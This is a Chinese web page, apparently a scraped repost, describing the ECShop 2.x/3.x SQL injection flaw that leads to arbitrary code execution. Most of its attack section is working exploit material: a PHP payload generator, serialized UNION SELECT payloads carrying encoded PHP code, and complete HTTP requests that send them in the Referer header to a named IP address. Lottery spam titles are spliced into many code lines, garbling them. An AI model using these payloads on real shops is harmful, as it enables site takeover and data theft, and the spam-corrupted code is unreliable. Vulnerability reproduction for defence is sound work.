澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全

您的位置:主页 > 文章 >
文章

ECShop 2.x/3.x SQL注入/任意代码执行漏洞

2020-05-18作者:睡觉来源:次阅读

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL库构架开发的跨平台开源程序。

其2017年及以前的版本中,存在一处SQL注入,通过该可注入恶意,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。

生成2.x和3.x的POC

  1. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 <?php

  2. $shell = bin2hex("{$asd'];phpinfot();//}xxx");

  3. $id = "-1' UNION/*";

  4. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 $arr = [

  5.     "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),

  6. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全     "id" => $id

  7. ];

  8.  

  9. $s = serialize($arr);

  10.  

  11. $hash3 = '45ea207d7a2b68c49582d2d22adf953a';

  12. $hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

  13.  

  14. echo "POC for ECShop 2.x: n";

  15. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 echo "{$hash2}ads|{$s}{$hash2}";

  16. echo "nnPOC for ECShop 3.x: n";

  17. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 echo "{$hash3}ads|{$s}{$hash3}";

2.x poc

  1. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

3.x poc

  1. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

2.x 生成的POC,放在Referer里发送:

  1. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 GET /user.php HTTP/1.1

  2. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 Host: 188.40.189.134:8080

  3. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0

  4. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8

  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

  6. Accept-Encoding: gzip, deflate

  7. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 Connection: close

  8. Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

  9. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 Cookie: has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; ECS[visit_times]=1

  10. Upgrade-Insecure-Requests: 1

ECShop 2.x/3.x SQL注入/任意代码执行漏洞

3.x生成poc,放在Referer里发送:

  1. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 GET /user.php HTTP/1.1

  2. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 Host: 188.40.189.134:8081

  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0

  4. Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8

  5. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

  6. Accept-Encoding: gzip, deflate

  7. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 Connection: close

  8. 澳门六合开奖结果-澳门金六彩开奖结果-澳门三合图库资料大全 Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

  9. Cookie: has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; ECS[visit_times]=2

  10. Upgrade-Insecure-Requests: 1

ECShop 2.x/3.x SQL注入/任意代码执行漏洞


ECShop 2.x/3.x SQL注入/任意代码执行漏洞 相关的内容:

关于 ECShop 2.x/3.x SQL注入/任意代码执行漏洞 的评论